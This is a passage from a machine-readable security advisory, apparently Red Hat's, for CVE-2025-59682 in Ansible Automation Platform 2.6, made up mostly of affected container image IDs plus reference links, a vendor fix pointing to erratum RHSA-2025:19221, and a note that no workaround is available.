"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59682"
},
{
"category": "external",
"summary": "RHBZ#2400450",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400450"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59682"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59682",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59682"
}
],
"release_date": "2025-10-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-28T21:16:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19221"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
